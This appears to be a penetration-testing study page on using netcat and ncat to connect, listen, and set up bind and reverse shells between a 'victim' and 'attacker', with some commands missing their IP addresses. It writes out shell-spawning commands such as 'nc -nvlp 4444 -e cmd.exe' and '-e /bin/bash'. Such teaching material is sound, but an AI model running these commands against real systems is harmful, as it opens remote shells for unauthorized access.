Purpose? - To establish connections on open ports and create listening ports on local machine | REVERSE SHELL Section in development

This tool allows us to bind to a given port of a given IP address. It is of help when trying to send files between machines, developing exploit payloads that would serve a backdoor on a target.

The scope of this document limits to a discussion of how to use netcat/ncat to connect to clients and serve opening ports

Connecting vs Listening

To attempt to establish a connection with TCP port:

nc -nv [destination ip] [destination port]

To listen on TCP port:

nc -nvlp 4444

Bind Shell: Attacker connects to a victim on listening PORTS

  1. On Windows Machine - set netcat/ncat to listen on 4444/TCP:

    Once Netcat is running 'cmd line:' prompt will appear; we will pass it the command line executable.

    nc -nvlp 4444 -e cmd.exe

  2. On Linux Machine - set netcat to connect to 4444/TCP:

    nc -nv 4444 -e /bin/bash

In the Bind Shell case described in 1 & 2 the Windows machine is the victim that has been set up to listen on 4444/TCP

Reverse Shell: Victim connects to attacker on listening PORTS

This is the one you will be using the most

  1. On Linux Machine - set netcat to listen on 4444/TCP:

    nc -nvlp 4444

  2. On Windows Machine - connect to machine on 4444/TCP:


Once Netcat is running 'Cmd line:' prompt will appear, using the -e switch, we pass the command line executable "cmd.exe" to the destination host:

Cmd line: -nv 4444 -e cmd.exe

It's just a modern implementation of netcat by the authors of nmap. They describe it as:

"Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved re-implementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses."

  .       .       
   } 6 6 {        
  ==. Y ,==       
    /^^^\  .      
   /     \  )     
  (  )-(  )/     _
  -""---""---   / 
 /   Ncat    \_/  
(     ____        

Last updated